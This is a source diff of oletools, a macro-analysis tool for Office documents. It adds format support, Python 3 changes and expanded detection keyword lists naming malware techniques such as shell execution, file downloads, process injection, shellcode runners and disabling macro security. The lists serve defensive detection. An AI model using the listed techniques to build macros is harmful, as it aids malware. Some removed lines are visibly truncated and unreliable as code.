+ options.input += [options.more_input, ]
+ if options.verbose:
+ options.loglevel = 'debug'
# Print help if no arguments are passed
- if len(args) == 0:
- print (__doc__)
+ if not options.input:
parser.print_help()
- sys.exit()
+ return RETURN_ERR_ARGS
# Setup logging to the console:
# here we use stdout instead of stderr by default, so that the output
@@ -452,15 +907,37 @@ def main():
format='%(levelname)-8s %(message)s')
# enable logging in the modules:
log.setLevel(logging.NOTSET)
-
-
- for container, filename, data in xglob.iter_files(args, recursive=options.recursive,
- zip_password=options.zip_password, zip_fname=options.zip_fname):
+ if options.loglevel == 'debug-olefile':
+ olefile.enable_logging()
+
+ # remember if there was a problem and continue with other data
+ any_err_stream = False
+ any_err_dumping = False
+ any_did_dump = False
+
+ for container, filename, data in \
+ xglob.iter_files(options.input, recursive=options.recursive,
+ zip_password=options.zip_password,
+ zip_fname=options.zip_fname):
# ignore directory names stored in zip files:
if container and filename.endswith('/'):
continue
- process_file(container, filename, data, options.output_dir)
+ err_stream, err_dumping, did_dump = \
+ process_file(filename, data, options.output_dir)
+ any_err_stream |= err_stream
+ any_err_dumping |= err_dumping
+ any_did_dump |= did_dump
+
+ # assemble return value
+ return_val = RETURN_NO_DUMP
+ if any_did_dump:
+ return_val += RETURN_DID_DUMP
+ if any_err_stream:
+ return_val += RETURN_ERR_STREAM
+ if any_err_dumping:
+ return_val += RETURN_ERR_DUMP
+ return return_val
-if __name__ == '__main__':
- main()
+if __name__ == '__main__':
+ sys.exit(main())
diff --git a/oletools/oletimes.py b/oletools/oletimes.py
index a00ce3d4..5d7809a2 100644
--- a/oletools/oletimes.py
+++ b/oletools/oletimes.py
@@ -16,7 +16,7 @@
#=== LICENSE =================================================================
-# oletimes is copyright (c) 2013-2017, Philippe Lagadec (http://www.decalage.info)
+# oletimes is copyright (c) 2013-2019, Philippe Lagadec (http://www.decalage.info)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
@@ -50,8 +50,9 @@
# 2016-09-05 PL: - added main entry point for setup.py
# 2017-05-03 v0.51 PL: - fixed absolute imports (issue #141)
# 2017-05-04 PL: - added optparse and xglob (issue #141)
+# 2018-09-11 v0.54 PL: - olefile is now a dependency
-__version__ = '0.51'
+__version__ = '0.54'
#------------------------------------------------------------------------------
# TODO:
@@ -75,7 +76,7 @@
if not _parent_dir in sys.path:
sys.path.insert(0, _parent_dir)
-from oletools.thirdparty import olefile
+import olefile
from oletools.thirdparty import xglob
from oletools.thirdparty.prettytable import prettytable
diff --git a/oletools/olevba.py b/oletools/olevba.py
index 67d42ca8..dbb5ffe7 100644
--- a/oletools/olevba.py
+++ b/oletools/olevba.py
@@ -5,14 +5,20 @@
olevba is a script to parse OLE and OpenXML files such as MS Office documents
(e.g. Word, Excel), to extract VBA Macro code in clear text, deobfuscate
and analyze malicious macros.
+XLM/Excel 4 Macros are also supported in Excel and SLK files.
Supported formats:
-- Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm)
-- Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb)
-- PowerPoint 97-2003 (.ppt), PowerPoint 2007+ (.pptm, .ppsm)
-- Word 2003 XML (.xml)
-- Word/Excel Single File Web Page / MHTML (.mht)
-- Publisher (.pub)
+ - Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm)
+ - Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb)
+ - PowerPoint 97-2003 (.ppt), PowerPoint 2007+ (.pptm, .ppsm)
+ - Word/PowerPoint 2007+ XML (aka Flat OPC)
+ - Word 2003 XML (.xml)
+ - Word/Excel Single File Web Page / MHTML (.mht)
+ - Publisher (.pub)
+ - SYLK/SLK files (.slk)
+ - Text file containing VBA or VBScript source code
+ - Password-protected Zip archive containing any of the above
+ - raises an error if run with files encrypted using MS Crypto API RC4
Author: Philippe Lagadec - http://www.decalage.info
License: BSD, see source code or documentation
@@ -26,7 +32,7 @@
# === LICENSE ==================================================================
-# olevba is copyright (c) 2014-2017 Philippe Lagadec (http://www.decalage.info)
+# olevba is copyright (c) 2014-2020 Philippe Lagadec (http://www.decalage.info)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
@@ -196,9 +202,33 @@
# 2017-05-31 c1fe: - PR #135 fixing issue #132 for some Mac files
# 2017-06-08 PL: - fixed issue #122 Chr() with negative numbers
# 2017-06-15 PL: - deobfuscation line by line to handle large files
-# 2017-07-11 v0.51.1 PL: - raise exception instead of sys.exit (issue #180)
-
-__version__ = '0.51.1dev1'
+# 2017-07-11 v0.52 PL: - raise exception instead of sys.exit (issue #180)
+# 2017-11-08 VB: - PR #124 adding user form parsing (Vincent Brillault)
+# 2017-11-17 PL: - fixed a few issues with form parsing
+# 2017-11-20 PL: - fixed issue #219, do not close the file too early
+# 2017-11-24 PL: - added keywords to detect self-modifying macros and
+# attempts to disable macro security (issue #221)
+# 2018-03-19 PL: - removed pyparsing from the thirdparty subfolder
+# 2018-04-15 v0.53 PL: - added support for Word/PowerPoint 2007+ XML (FlatOPC)
+# (issue #283)
+# 2018-09-11 v0.54 PL: - olefile is now a dependency
+# 2018-10-08 PL: - replace backspace before printing to console (issue #358)
+# 2018-10-25 CH: - detect encryption and raise error if detected
+# 2018-12-03 PL: - uses tablestream (+colors) instead of prettytable
+# 2018-12-06 PL: - colorize the suspicious keywords found in VBA code
+# 2019-01-01 PL: - removed support for Python 2.6
+# 2019-03-18 PL: - added XLM/XLF macros detection for Excel OLE files
+# 2019-03-25 CH: - added decryption of password-protected files
+# 2019-04-09 PL: - decompress_stream accepts bytes (issue #422)
+# 2019-05-23 v0.55 PL: - added option --pcode to call pcodedmp and display P-code
+# 2019-06-05 PL: - added VBA stomping detection
+# 2019-09-24 PL: - included DridexUrlDecode into olevba (issue #485)
+# 2019-12-03 PL: - added support for SLK files and XLM macros in SLK
+# 2020-01-31 v0.56 KS: - added option --no-xlm, improved MHT detection
+# 2020-03-22 PL: - uses plugin_biff to display DCONN objects and their URL
+# 2020-06-11 PL: - fixed issue #575 when decompressing raw chunks in VBA
+
+__version__ = '0.56dev6'
#------------------------------------------------------------------------------
# TODO:
@@ -223,20 +253,22 @@
# - extract_macros: use combined struct.unpack instead of many calls
# - all except clauses should target specific exceptions
-#------------------------------------------------------------------------------
+# ------------------------------------------------------------------------------
# REFERENCES:
# - [MS-OVBA]: Microsoft Office VBA File Format Structure
# http://msdn.microsoft.com/en-us/library/office/cc313094%28v=office.12%29.aspx
# - officeparser: https://github.com/unixfreak0037/officeparser
-#--- IMPORTS ------------------------------------------------------------------
+# --- IMPORTS ------------------------------------------------------------------
+import traceback
import sys
import os
import logging
import struct
-import cStringIO
+from copy import copy
+from io import BytesIO, StringIO
import math
import zipfile
import re
@@ -245,7 +277,8 @@
import base64
import zlib
import email # for MHTML parsing
-import string # for printable
+import email.feedparser
+import string # for printable
import json # for json output mode (argument --json)
# import lxml or ElementTree for XML parsing:
@@ -265,6 +298,13 @@
+ "see http://codespeak.net/lxml " \
+ "or http://effbot.org/zone/element-index.htm")
+import colorclass
+
+# On Windows, colorclass needs to be enabled:
+if os.name == 'nt':
+ colorclass.Windows.enable(auto_colors=True)
+
+
# IMPORTANT: it should be possible to run oletools directly as scripts
# in any directory without installing them with pip or setup.py.
# In that case, relative imports are NOT usable.
@@ -274,53 +314,99 @@
# print('_thismodule_dir = %r' % _thismodule_dir)
_parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '..'))
# print('_parent_dir = %r' % _thirdparty_dir)
-if not _parent_dir in sys.path:
+if _parent_dir not in sys.path:
sys.path.insert(0, _parent_dir)
-from oletools.thirdparty import olefile
-from oletools.thirdparty.prettytable import prettytable
+import olefile
+from oletools.thirdparty.tablestream import tablestream
from oletools.thirdparty.xglob import xglob, PathNotFoundException
-from oletools.thirdparty.pyparsing.pyparsing import \
+from pyparsing import \
CaselessKeyword, CaselessLiteral, Combine, Forward, Literal, \
Optional, QuotedString,Regex, Suppress, Word, WordStart, \
alphanums, alphas, hexnums,nums, opAssoc, srange, \
infixNotation, ParserElement
from oletools import ppt_parser
-
-
-# monkeypatch email to fix issue #32:
-# allow header lines without ":"
-import email.feedparser
-email.feedparser.headerRE = re.compile(r'^(From |[\041-\071\073-\176]{1,}:?|[\t ])')
+from oletools import oleform
+from oletools import rtfobj
+from oletools import crypto
+from oletools.common.io_encoding import ensure_stdout_handles_unicode
+from oletools.common import codepages
# === PYTHON 2+3 SUPPORT ======================================================
if sys.version_info[0] <= 2:
# Python 2.x
- if sys.version_info[1] <= 6:
- # Python 2.6
- # use is_zipfile backported from Python 2.7:
- from thirdparty.zipfile27 import is_zipfile
- else:
- # Python 2.7
- from zipfile import is_zipfile
+ PYTHON2 = True
+ # to use ord on bytes/bytearray items the same way in Python 2+3
+ # on Python 2, just use the normal ord() because items are bytes
+ byte_ord = ord
+ #: Default string encoding for the olevba API
+ DEFAULT_API_ENCODING = 'utf8' # on Python 2: UTF-8 (bytes)
else:
# Python 3.x+
- from zipfile import is_zipfile
+ PYTHON2 = False
+
+ # to use ord on bytes/bytearray items the same way in Python 2+3
+ # on Python 3, items are int, so just return the item
+ def byte_ord(x):
+ return x
# xrange is now called range:
xrange = range
+ # unichr does not exist anymore, only chr:
+ unichr = chr
+ # json2ascii also needs "unicode":
+ unicode = str
+ from functools import reduce
+ #: Default string encoding for the olevba API
+ DEFAULT_API_ENCODING = None # on Python 3: None (unicode)
+ # Python 3.0 - 3.4 support:
+ # From https://gist.github.com/ynkdir/867347/c5e188a4886bc2dd71876c7e069a7b00b6c16c61
+ if sys.version_info < (3, 5):
+ import codecs
+ _backslashreplace_errors = codecs.lookup_error("backslashreplace")
+
+ def backslashreplace_errors(exc):
+ if isinstance(exc, UnicodeDecodeError):
+ u = "".join("\\x{0:02x}".format(c) for c in exc.object[exc.start:exc.end])
+ return u, exc.end
+ return _backslashreplace_errors(exc)
+
+ codecs.register_error("backslashreplace", backslashreplace_errors)
+
+
+def unicode2str(unicode_string):
+ """
+ convert a unicode string to a native str:
+ - on Python 3, it returns the same string
+ - on Python 2, the string is encoded with UTF-8 to a bytes str
+ :param unicode_string: unicode string to be converted
+ :return: the string converted to str
+ :rtype: str
+ """
+ if PYTHON2:
+ return unicode_string.encode('utf8', errors='replace')
+ else:
+ return unicode_string
-# === LOGGING =================================================================
-class NullHandler(logging.Handler):
+def bytes2str(bytes_string, encoding='utf8'):
"""
- Log Handler without output, to avoid printing messages if logging is not
- configured by the main application.
- Python 2.7 has logging.NullHandler, but this is necessary for 2.6:
- see https://docs.python.org/2.6/library/logging.html#configuring-logging-for-a-library
+ convert a bytes string to a native str:
+ - on Python 2, it returns the same string (bytes=str)
+ - on Python 3, the string is decoded using the provided encoding
+ (UTF-8 by default) to a unicode str
+ :param bytes_string: bytes string to be converted
+ :param encoding: codec to be used for decoding
+ :return: the string converted to str
+ :rtype: str
"""
- def emit(self, record):
- pass
+ if PYTHON2:
+ return bytes_string
+ else:
+ return bytes_string.decode(encoding, errors='replace')
+
+
+# === LOGGING =================================================================
def get_logger(name, level=logging.CRITICAL+1):
"""
@@ -334,7 +420,7 @@ def get_logger(name, level=logging.CRITICAL+1):
# First, test if there is already a logger with the same name, else it
# will generate duplicate messages (due to duplicate handlers):
if name in logging.Logger.manager.loggerDict:
- #NOTE: another less intrusive but more "hackish" solution would be to
+ # NOTE: another less intrusive but more "hackish" solution would be to
# use getLogger then test if its effective level is not default.
logger = logging.getLogger(name)
# make sure level is OK:
@@ -344,7 +430,7 @@ def get_logger(name, level=logging.CRITICAL+1):
logger = logging.getLogger(name)
# only add a NullHandler for this logger, it is up to the application
# to configure its own logging:
- logger.addHandler(NullHandler())
+ logger.addHandler(logging.NullHandler())
logger.setLevel(level)
return logger
@@ -361,6 +447,7 @@ def enable_logging():
log.setLevel(logging.NOTSET)
# Also enable logging in the ppt_parser module:
ppt_parser.enable_logging()
+ crypto.enable_logging()
@@ -449,6 +536,7 @@ def __init__(self, stream_path, variable, expected, value):
RETURN_PARSE_ERROR = 6
RETURN_SEVERAL_ERRS = 7
RETURN_UNEXPECTED = 8
+RETURN_ENCRYPTED = 9
# MAC codepages (from http://stackoverflow.com/questions/1592925/decoding-mac-os-text-in-python)
MAC_CODEPAGES = {
@@ -473,19 +561,23 @@ def __init__(self, stream_path, variable, expected, value):
# Container types:
TYPE_OLE = 'OLE'
TYPE_OpenXML = 'OpenXML'
+TYPE_FlatOPC_XML = 'FlatOPC_XML'
TYPE_Word2003_XML = 'Word2003_XML'
TYPE_MHTML = 'MHTML'
TYPE_TEXT = 'Text'
TYPE_PPT = 'PPT'
+TYPE_SLK = 'SLK'
# short tag to display file types in triage mode:
TYPE2TAG = {
TYPE_OLE: 'OLE:',
TYPE_OpenXML: 'OpX:',
+ TYPE_FlatOPC_XML: 'FlX:',
TYPE_Word2003_XML: 'XML:',
TYPE_MHTML: 'MHT:',
TYPE_TEXT: 'TXT:',
- TYPE_PPT: 'PPT',
+ TYPE_PPT: 'PPT:',
+ TYPE_SLK: 'SLK:',
}
@@ -502,7 +594,20 @@ def __init__(self, stream_path, variable, expected, value):
TAG_BINDATA = NS_W + 'binData'
ATTR_NAME = NS_W + 'name'
+# Namespaces and tags for Word/PowerPoint 2007+ XML parsing:
+# root:
+NS_XMLPACKAGE = '{http://schemas.microsoft.com/office/2006/xmlPackage}'
+TAG_PACKAGE = NS_XMLPACKAGE + 'package'
+# the tag includes that contains the VBA macro code in Base64:
+#
+TAG_PKGPART = NS_XMLPACKAGE + 'part'
+ATTR_PKG_NAME = NS_XMLPACKAGE + 'name'
+ATTR_PKG_CONTENTTYPE = NS_XMLPACKAGE + 'contentType'
+CTYPE_VBAPROJECT = "application/vnd.ms-office.vbaProject"
+TAG_PKGBINDATA = NS_XMLPACKAGE + 'binaryData'
+
# Keywords to detect auto-executable macros
+# Simple strings, without regex characters:
AUTOEXEC_KEYWORDS = {
# MS Word:
'Runs when the Word document is opened':
@@ -522,16 +627,27 @@ def __init__(self, stream_path, variable, expected, value):
# MS Excel:
'Runs when the Excel Workbook is opened':
- ('Auto_Open', 'Workbook_Open', 'Workbook_Activate'),
+ ('Auto_Open', 'Workbook_Open', 'Workbook_Activate', 'Auto_Ope'),
+ # TODO: "Auto_Ope" is temporarily here because of a bug in plugin_biff, which misses the last byte in "Auto_Open"...
'Runs when the Excel Workbook is closed':
('Auto_Close', 'Workbook_Close'),
+}
+# Keywords to detect auto-executable macros
+# Regular expressions:
+AUTOEXEC_KEYWORDS_REGEX = {
# any MS Office application:
'Runs when the file is opened (using InkPicture ActiveX object)':
# ref:https://twitter.com/joe4security/status/770691099988025345
- (r'\w+_Painted',),
+ (r'\w+_Painted', r'\w+_Painting'),
'Runs when the file is opened and ActiveX objects trigger events':
- (r'\w+_(?:GotFocus|LostFocus|MouseHover)',),
+ (r'\w+_GotFocus', r'\w+_LostFocus', r'\w+_MouseHover', r'\w+_Click',
+ r'\w+_Change', r'\w+_Resize', r'\w+_BeforeNavigate2', r'\w+_BeforeScriptExecute',
+ r'\w+_DocumentComplete', r'\w+_DownloadBegin', r'\w+_DownloadComplete',
+ r'\w+_FileDownload', r'\w+_NavigateComplete2', r'\w+_NavigateError',
+ r'\w+_ProgressChange', r'\w+_PropertyChange', r'\w+_SetSecureLockIcon',
+ r'\w+_StatusTextChange', r'\w+_TitleChange', r'\w+_MouseMove', r'\w+_MouseEnter',
+ r'\w+_MouseLeave', r'\w+_Layout', r'\w+_OnConnecting'),
}
# Suspicious Keywords that may be used by malware
@@ -558,14 +674,13 @@ def __init__(self, stream_path, variable, expected, value):
('CreateTextFile', 'ADODB.Stream', 'WriteText', 'SaveToFile'),
#CreateTextFile: http://msdn.microsoft.com/en-us/library/office/gg264617%28v=office.15%29.aspx
#ADODB.Stream sample: http://pastebin.com/Z4TMyuq6
+ # ShellExecute: https://twitter.com/StanHacked/status/1075088449768693762
'May run an executable file or a system command':
('Shell', 'vbNormal', 'vbNormalFocus', 'vbHide', 'vbMinimizedFocus', 'vbMaximizedFocus', 'vbNormalNoFocus',
- 'vbMinimizedNoFocus', 'WScript.Shell', 'Run', 'ShellExecute'),
+ 'vbMinimizedNoFocus', 'WScript.Shell', 'Run', 'ShellExecute', 'ShellExecuteA', 'shell32'),
# MacScript: see https://msdn.microsoft.com/en-us/library/office/gg264812.aspx
'May run an executable file or a system command on a Mac':
('MacScript',),
- 'May run an executable file or a system command on a Mac (if combined with libc.dylib)':
- ('system', 'popen', r'exec[lv][ep]?'),
#Shell: http://msdn.microsoft.com/en-us/library/office/gg278437%28v=office.15%29.aspx
#WScript.Shell+Run sample: http://pastebin.com/Z4TMyuq6
'May run PowerShell commands':
@@ -578,6 +693,10 @@ def __init__(self, stream_path, variable, expected, value):
'invoke-command', 'scriptblock', 'Invoke-Expression', 'AuthorizationManager'),
'May run an executable file or a system command using PowerShell':
('Start-Process',),
+ 'May run an executable file or a system command using Excel 4 Macros (XLM/XLF)':
+ ('EXEC',),
+ 'May call a DLL using Excel 4 Macros (XLM/XLF)':
+ ('REGISTER', 'CALL'),
'May hide the application':
('Application.Visible', 'ShowWindow', 'SW_HIDE'),
'May create a directory':
@@ -593,6 +712,8 @@ def __init__(self, stream_path, variable, expected, value):
('New-Object',),
'May run an application (if combined with CreateObject)':
('Shell.Application',),
+ 'May run an Excel 4 Macro (aka XLM/XLF) from VBA':
+ ('ExecuteExcel4Macro',),
'May enumerate application windows (if combined with Shell.Application object)':
('Windows', 'FindWindow'),
'May run code from a DLL':
@@ -601,13 +722,16 @@ def __init__(self, stream_path, variable, expected, value):
'May run code from a library on a Mac':
#TODO: regex to find declare+lib on same line - see mraptor
('libc.dylib', 'dylib'),
+ 'May run code from a DLL using Excel 4 Macros (XLM/XLF)':
+ ('REGISTER',),
'May inject code into another process':
- ('CreateThread', 'VirtualAlloc', # (issue #9) suggested by Davy Douhine - used by MSF payload
- 'VirtualAllocEx', 'RtlMoveMemory',
+ ('CreateThread', 'CreateUserThread', 'VirtualAlloc', # (issue #9) suggested by Davy Douhine - used by MSF payload
+ 'VirtualAllocEx', 'RtlMoveMemory', 'WriteProcessMemory',
+ 'SetContextThread', 'QueueApcThread', 'WriteVirtualMemory', 'VirtualProtect',
),
'May run a shellcode in memory':
- ('EnumSystemLanguageGroupsW?', # Used by Hancitor in Oct 2016
- 'EnumDateFormats(?:W|(?:Ex){1,2})?'), # see https://msdn.microsoft.com/en-us/library/windows/desktop/dd317810(v=vs.85).aspx
+ ('SetTimer', # Vidar sample: https://app.any.run/tasks/897f28e7-3162-4b65-b268-2655543199d6/
+ ),
'May download files from the Internet':
#TODO: regex to find urlmon+URLDownloadToFileA on same line
('URLDownloadToFileA', 'Msxml2.XMLHTTP', 'Microsoft.XMLHTTP',
@@ -662,6 +786,34 @@ def __init__(self, stream_path, variable, expected, value):
'May detect WinJail Sandbox':
# ref: http://www.cplusplus.com/forum/windows/96874/
('Afx:400000:0',),
+ 'May attempt to disable VBA macro security and Protected View':
+ # ref: http://blog.trendmicro.com/trendlabs-security-intelligence/qkg-filecoder-self-replicating-document-encrypting-ransomware/
+ # ref: https://thehackernews.com/2017/11/ms-office-macro-malware.html
+ ('AccessVBOM', 'VBAWarnings', 'ProtectedView', 'DisableAttachementsInPV', 'DisableInternetFilesInPV',
+ 'DisableUnsafeLocationsInPV', 'blockcontentexecutionfrominternet'),
+ 'May attempt to modify the VBA code (self-modification)':
+ ('VBProject', 'VBComponents', 'CodeModule', 'AddFromString'),
+ 'May modify Excel 4 Macro formulas at runtime (XLM/XLF)':
+ ('FORMULA.FILL',),
+}
+
+# Suspicious Keywords to be searched for directly as regex, without escaping
+SUSPICIOUS_KEYWORDS_REGEX = {
+ 'May use Word Document Variables to store and hide data':
+ (r'\.\s*Variables',), # '.Variables' with optional whitespaces after the dot
+ # Vidar sample: https://app.any.run/tasks/897f28e7-3162-4b65-b268-2655543199d6/
+ 'May run a shellcode in memory':
+ (r'EnumSystemLanguageGroupsW?', # Used by Hancitor in Oct 2016
+ r'EnumDateFormats(?:W|(?:Ex){1,2})?', # see https://msdn.microsoft.com/en-us/library/windows/desktop/dd317810(v=vs.85).aspx
+ ),
+ 'May run an executable file or a system command on a Mac (if combined with libc.dylib)':
+ ('system', 'popen', r'exec[lv][ep]?'),
+}
+
+# Suspicious Keywords to be searched for directly as strings, without regex
+SUSPICIOUS_KEYWORDS_NOREGEX = {
+ 'May use special characters such as backspace to obfuscate code when printed on the console':
+ ('\b',),
}
# Regular Expression for a URL:
@@ -713,7 +865,8 @@ def __init__(self, stream_path, variable, expected, value):
BASE64_RE = r'(?:[A-Za-z0-9+/]{4}){1,}(?:[A-Za-z0-9+/]{2}[AEIMQUYcgkosw048]=|[A-Za-z0-9+/][AQgw]==)?'
re_base64_string = re.compile('"' + BASE64_RE + '"')
# white list of common strings matching the base64 regex, but which are not base64 strings (all lowercase):
-BASE64_WHITELIST = set(['thisdocument', 'thisworkbook', 'test', 'temp', 'http', 'open', 'exit'])
+BASE64_WHITELIST = set(['thisdocument', 'thisworkbook', 'test', 'temp', 'http', 'open', 'exit', 'kernel32',
+ 'virtualalloc', 'createthread'])
# regex to detect strings encoded with a specific Dridex algorithm
# (see https://github.com/JamesHabben/MalwareStuff)
@@ -722,7 +875,8 @@ def __init__(self, stream_path, variable, expected, value):
re_nothex_check = re.compile(r'[G-Zg-z]')
# regex to extract printable strings (at least 5 chars) from VBA Forms:
-re_printable_string = re.compile(r'[\t\r\n\x20-\xFF]{5,}')
+# (must be bytes for Python 3)
+re_printable_string = re.compile(b'[\\t\\r\\n\\x20-\\xFF]{5,}')
# === PARTIAL VBA GRAMMAR ====================================================
@@ -863,10 +1017,13 @@ class VbaExpressionString(str):
def vba_chr_tostr(t):
try:
i = t[0]
- # normal, non-unicode character:
if i>=0 and i<=255:
+ # normal, non-unicode character:
+ # TODO: check if it needs to be converted to bytes for Python 3
return VbaExpressionString(chr(i))
else:
+ # unicode character
+ # Note: this distinction is only needed for Python 2
return VbaExpressionString(unichr(i).encode('utf-8', 'backslashreplace'))
except ValueError:
log.exception('ERROR: incorrect parameter value for chr(): %r' % i)
@@ -1133,8 +1290,9 @@ def decompress_stream(compressed_container):
"""
Decompress a stream according to MS-OVBA section 2.4.1
- compressed_container: string compressed according to the MS-OVBA 2.4.1.3.6 Compression algorithm
- return the decompressed container as a string (bytes)
+ :param compressed_container bytearray: bytearray or bytes compressed according to the MS-OVBA 2.4.1.3.6 Compression algorithm
+ :return: the decompressed container as a bytes string
+ :rtype: bytes
"""
# 2.4.1.2 State Variables
@@ -1156,10 +1314,14 @@ def decompress_stream(compressed_container):
# DecompressedChunkStart: The location of the first byte of the DecompressedChunk (section 2.4.1.1.3) within the
# DecompressedBuffer (section 2.4.1.1.2).
- decompressed_container = '' # result
+ # Check the input is a bytearray, otherwise convert it (assuming it's bytes):
+ if not isinstance(compressed_container, bytearray):
+ compressed_container = bytearray(compressed_container)
+ # raise TypeError('decompress_stream requires a bytearray as input')
+ decompressed_container = bytearray() # result
compressed_current = 0
- sig_byte = ord(compressed_container[compressed_current])
+ sig_byte = compressed_container[compressed_current]
if sig_byte != 0x01:
raise ValueError('invalid signature byte {0:02X}'.format(sig_byte))
@@ -1205,7 +1367,7 @@ def decompress_stream(compressed_container):
# MS-OVBA 2.4.1.3.3 Decompressing a RawChunk
# uncompressed chunk: read the next 4096 bytes as-is
#TODO: check if there are at least 4096 bytes left
- decompressed_container += compressed_container[compressed_current:compressed_current + 4096]
+ decompressed_container.extend(compressed_container[compressed_current:compressed_current + 4096])
compressed_current += 4096
else:
# MS-OVBA 2.4.1.3.2 Decompressing a CompressedChunk
@@ -1216,7 +1378,7 @@ def decompress_stream(compressed_container):
# log.debug('compressed_current = %d / compressed_end = %d' % (compressed_current, compressed_end))
# FlagByte: 8 bits indicating if the following 8 tokens are either literal (1 byte of plain text) or
# copy tokens (reference to a previous literal token)
- flag_byte = ord(compressed_container[compressed_current])
+ flag_byte = compressed_container[compressed_current]
compressed_current += 1
for bit_index in xrange(0, 8):
# log.debug('bit_index=%d / compressed_current=%d / compressed_end=%d' % (bit_index, compressed_current, compressed_end))
@@ -1228,7 +1390,7 @@ def decompress_stream(compressed_container):
#log.debug('bit_index=%d: flag_bit=%d' % (bit_index, flag_bit))
if flag_bit == 0: # LiteralToken
# copy one byte directly to output
- decompressed_container += compressed_container[compressed_current]
+ decompressed_container.extend([compressed_container[compressed_current]])
compressed_current += 1
else: # CopyToken
# MS-OVBA 2.4.1.3.19.2 Unpack CopyToken
@@ -1244,520 +1406,664 @@ def decompress_stream(compressed_container):
#log.debug('offset=%d length=%d' % (offset, length))
copy_source = len(decompressed_container) - offset
for index in xrange(copy_source, copy_source + length):
- decompressed_container += decompressed_container[index]
+ decompressed_container.extend([decompressed_container[index]])
compressed_current += 2
- return decompressed_container
+ return bytes(decompressed_container)
-def _extract_vba(ole, vba_root, project_path, dir_path, relaxed=False):
+class VBA_Module(object):
"""
- Extract VBA macros from an OleFileIO object.
- Internal function, do not call directly.
-
- vba_root: path to the VBA root storage, containing the VBA storage and the PROJECT stream
- vba_project: path to the PROJECT stream
- :param relaxed: If True, only create info/debug log entry if data is not as expected
- (e.g. opening substream fails); if False, raise an error in this case
- This is a generator, yielding (stream path, VBA filename, VBA source code) for each VBA code stream
+ Class to parse a VBA module from an OLE file, and to store all the corresponding
+ metadata and VBA source code.
"""
- # Open the PROJECT stream:
- project = ole.openstream(project_path)
- log.debug('relaxed is %s' % relaxed)
- # sample content of the PROJECT stream:
-
- ## ID="{5312AC8A-349D-4950-BDD0-49BE3C4DD0F0}"
- ## Document=ThisDocument/&H00000000
- ## Module=NewMacros
- ## Name="Project"
- ## HelpContextID="0"
- ## VersionCompatible32="393222000"
- ## CMG="F1F301E705E705E705E705"
- ## DPB="8F8D7FE3831F2020202020"
- ## GC="2D2FDD81E51EE61EE6E1"
- ##
- ## [Host Extender Info]
- ## &H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
- ## &H00000002={000209F2-0000-0000-C000-000000000046};Word8.0;&H00000000
- ##
- ## [Workspace]
- ## ThisDocument=22, 29, 339, 477, Z
- ## NewMacros=-4, 42, 832, 510, C
-
- code_modules = {}
-
- for line in project:
- line = line.strip()
- if '=' in line:
- # split line at the 1st equal sign:
- name, value = line.split('=', 1)
- # looking for code modules
- # add the code module as a key in the dictionary
- # the value will be the extension needed later
- # The value is converted to lowercase, to allow case-insensitive matching (issue #3)
- value = value.lower()
- if name == 'Document':
- # split value at the 1st slash, keep 1st part:
- value = value.split('/', 1)[0]
- code_modules[value] = CLASS_EXTENSION
- elif name == 'Module':
- code_modules[value] = MODULE_EXTENSION
- elif name == 'Class':
- code_modules[value] = CLASS_EXTENSION
- elif name == 'BaseClass':
- code_modules[value] = FORM_EXTENSION
-
- # read data from dir stream (compressed)
- dir_compressed = ole.openstream(dir_path).read()
-
- def check_value(name, expected, value):
- if expected != value:
- if relaxed:
- log.error("invalid value for {0} expected {1:04X} got {2:04X}"
- .format(name, expected, value))
- else:
- raise UnexpectedDataError(dir_path, name, expected, value)
-
- dir_stream = cStringIO.StringIO(decompress_stream(dir_compressed))
-
- # PROJECTSYSKIND Record
- projectsyskind_id = struct.unpack(" 128:
- log.error("PROJECTNAME_SizeOfProjectName value not in range: {0}".format(projectname_sizeof_projectname))
- projectname_projectname = dir_stream.read(projectname_sizeof_projectname)
- unused = projectname_projectname
-
- # PROJECTDOCSTRING Record
- projectdocstring_id = struct.unpack(" 2000:
- log.error(
- "PROJECTDOCSTRING_SizeOfDocString value not in range: {0}".format(projectdocstring_sizeof_docstring))
- projectdocstring_docstring = dir_stream.read(projectdocstring_sizeof_docstring)
- projectdocstring_reserved = struct.unpack(" 260:
- log.error(
- "PROJECTHELPFILEPATH_SizeOfHelpFile1 value not in range: {0}".format(projecthelpfilepath_sizeof_helpfile1))
- projecthelpfilepath_helpfile1 = dir_stream.read(projecthelpfilepath_sizeof_helpfile1)
- projecthelpfilepath_reserved = struct.unpack(" 1015:
- log.error(
- "PROJECTCONSTANTS_SizeOfConstants value not in range: {0}".format(projectconstants_sizeof_constants))
- projectconstants_constants = dir_stream.read(projectconstants_sizeof_constants)
- projectconstants_reserved = struct.unpack(" 0:
- code_data = decompress_stream(code_data)
+ code_data = decompress_stream(bytearray(code_data))
+ # store the raw code encoded as bytes with the project's code page:
+ self.code_raw = code_data
+ # decode it to unicode:
+ self.code = project.decode_bytes(code_data)
+ # also store a native str version:
+ self.code_str = unicode2str(self.code)
# case-insensitive search in the code_modules dict to find the file extension:
- filext = code_modules.get(modulename_modulename.lower(), 'bin')
- filename = '{0}.{1}'.format(modulename_modulename, filext)
- #TODO: also yield the codepage so that callers can decode it properly
- yield (code_path, filename, code_data)
- # print '-'*79
- # print filename
- # print ''
- # print code_data
- # print ''
- log.debug('extracted file {0}'.format(filename))
+ filext = self.project.module_ext.get(self.name.lower(), 'vba')
+ self.filename = u'{0}.{1}'.format(self.name, filext)
+ self.filename_str = unicode2str(self.filename)
+ log.debug('extracted file {0}'.format(self.filename_str))
else:
- log.warning("module stream {0} has code data length 0".format(modulestreamname_streamname))
+ log.warning("module stream {0} has code data length 0".format(self.streamname_str))
except (UnexpectedDataError, SubstreamOpenError):
raise
except Exception as exc:
- log.info('Error parsing module {0} of {1} in _extract_vba:'
- .format(projectmodule_index, projectmodules_count),
+ log.info('Error parsing module {0} of {1}:'
+ .format(module_index, project.modules_count),
exc_info=True)
- if not relaxed:
+ if not project.relaxed:
raise
- _ = unused # make pylint happy: now variable "unused" is being used ;-)
- return
+
+
+class VBA_Project(object):
+ """
+ Class to parse a VBA project from an OLE file, and to store all the corresponding
+ metadata and VBA modules.
+ """
+
